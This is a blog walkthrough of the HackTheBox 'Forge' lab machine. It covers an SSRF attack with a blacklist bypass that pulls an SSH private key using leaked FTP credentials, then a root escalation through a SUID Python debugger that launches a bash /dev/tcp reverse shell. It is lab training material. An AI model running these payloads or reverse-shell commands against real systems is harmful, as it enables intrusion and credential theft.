In this post, I would like to share a walkthrough of the Forge Machine from HackTheBox


This room has been considered difficulty rated as a medium machine on HackThebox


Source: Hack the Box

What will you gain from the Forge machine?


For the user flag, you will execute some SSRF attack on the website to fetch any useful information from the server


As for the root flag, you need to run some PDB Python code where it is coming from the SUID file

Information Gathering


Once we have started the VPN connection which requires to download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN 

# Nmap 7.91 scan initiated Sat Sep 11 23:31:29 2021 as: nmap -sV -sC -oA intial -Pn 10.129.210.60
Nmap scan report for 10.129.210.60
Host is up (0.19s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE VERSION
21/tcp filtered ftp
22/tcp open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4f:78:65:66:29:e4:87:6b:3c:cc:b4:3a:d2:57:20:ac (RSA)
|   256 79:df:3a:f1:fe:87:4a:57:b0:fd:4e:d0:54:c6:28:d9 (ECDSA)
|_  256 b0:58:11:40:6d:8c:bd:c5:72:aa:83:08:c5:51:fb:33 (ED25519)
80/tcp open     http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://forge.htb
Service Info: Host: 10.129.210.60; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 11 23:32:11 2021 -- 1 IP address (1 host up) scanned in 42.51 seconds

We managed to sight a few ports open such as:

  • 21 – ftp
  • 22 – ssh
  • 80 – http

Let’s try to access the website interface

Source: Forge Website interface

Nothing that can interest me expect to Upload an Image


Before accessing the “Upload an Image”, we can enumerate the directory that can be found on the original domain.


However, there is no interesting directory that we can access


On the “Upload an Image” page, we managed to see two functions Upload local file and Upload from URL.


I have tried to upload some random files and received responses as shown above.


After a while, I managed to get some useful files from forge.htb/announcement


We got the link and let’s try to download on our machine.


Inside the file, we managed to gather a lot of information such as credentials and some ports been clarified open on the machine.


I have tried to access the machine via FTP but sadly, we found a dead-end via FTP.


I have been stuck here on the FTP access and I have some thought that there might be some subdomain for the machine. As a result, let’s enumerate the subdomain (if any) via gobuster vhost function


After a few minutes, we managed to notice there’s admin.forge.htb which provides some status 200


Sadly, we see some text “Only localhost is allowed!” which we again stuck with it.

Gaining Privileges Access


On the burp suite request for the Upload function, I notice that there’s some code (url=test.com&remote=1) after SoC-GPC


Let’s do some research on the attack which I believe is an SSRF attack

Source: What is SSRF (Server-side request forgery)? Tutorial & Examples | Web Security Academy (portswigger.net)

Let’s review what we have obtained until right now:

  • Subdomain: admin.forge.htb (only localhost is allowed)
  • ftp,ftps,http,https is open on the machine which opens to localhost
  • Credential information such as (username=user, password=heightofsecurity123!)

SSRF attack on forge.htb


Let’s apply the SSRF that we learn from portswigger.net onto the website interface on BurpSuite Request


We can insert the payload on the filled-up table such as shown above.


The payload would be something like http://admin.FORGE.HTB/upload?u=ftp://user:heightofsecurity123!@127.0.0.1/.ssh/id_rsa&remote=1 (Where I try to obtain ssh id_rsa)


From the inspection of the Burpsuite, we move to the repeater to understand the flow of the process. However, there’s an error like “URL contains a blacklisted address!”


Let’s try to change the subdomain to ADMIN.FORGE.htb and use other replacements for localhost such as 127.0.0.3


Voila! Finally, we got the link to download something from the machine.


Let’s retrieve the file using wget so that we can read the content of the file.


After multiple tries, we can retrieve the ssh id_rsa


Let’s access the machine via SSH service using the ssh id_rsa that we obtain previously

Maintaining Privileges Access on Forge Machine


At last, we are able to access the machine.


You can read the user flag by typing the “cat user.txt” command

Escalate to Root Privileges Access


In order to escalate to the root privileges access, we need to find out the SUID that we can abuse. For us to get that SUID file, we can run a simple command such as “sudo -l


We need to understand the SUID by reading the context of the file. I notice there’s a password (secretadminpassword) that we might be using in the future.


Without further ado, let’s try to run the SUID file and I notice the output is quite like nc function


There might be something to get the response from the machine.


Let’s try to open another ssh session on a different terminal.


We should try to telnet the localhost with the given port from the SUID file. Oh wow! It works and they are asking for the secret password which might be the password that we obtain from inside the SUID file


Gotcha! Now, let’s enter any character that is not mentioned over here.


We were able to get a response on the SUID file. From my experience, PDB might be a Python Debugger


However, it doesn’t do any harm to double-check on the internet


It’s a Python Debugger as I expected.


We cannot execute any Python code on PDB before the NC listener will need to be started


Let’s run a simple python code that will get a reverse shell connection back to us.


For Instance, the code can be seen below

import os
os.system("bash -c 'bash -i >& /dev/tcp/<Your IP>/<Port> 0>&1'")

Success! We now have a root Reverse Shell Connection back to us


As usual, we can read the root flag by executing the “cat /root/root.txt” command


-THE END-


Happy Learning Guys!

Extra Information


We can go to /etc/shadow so that we can unlock and read the write-up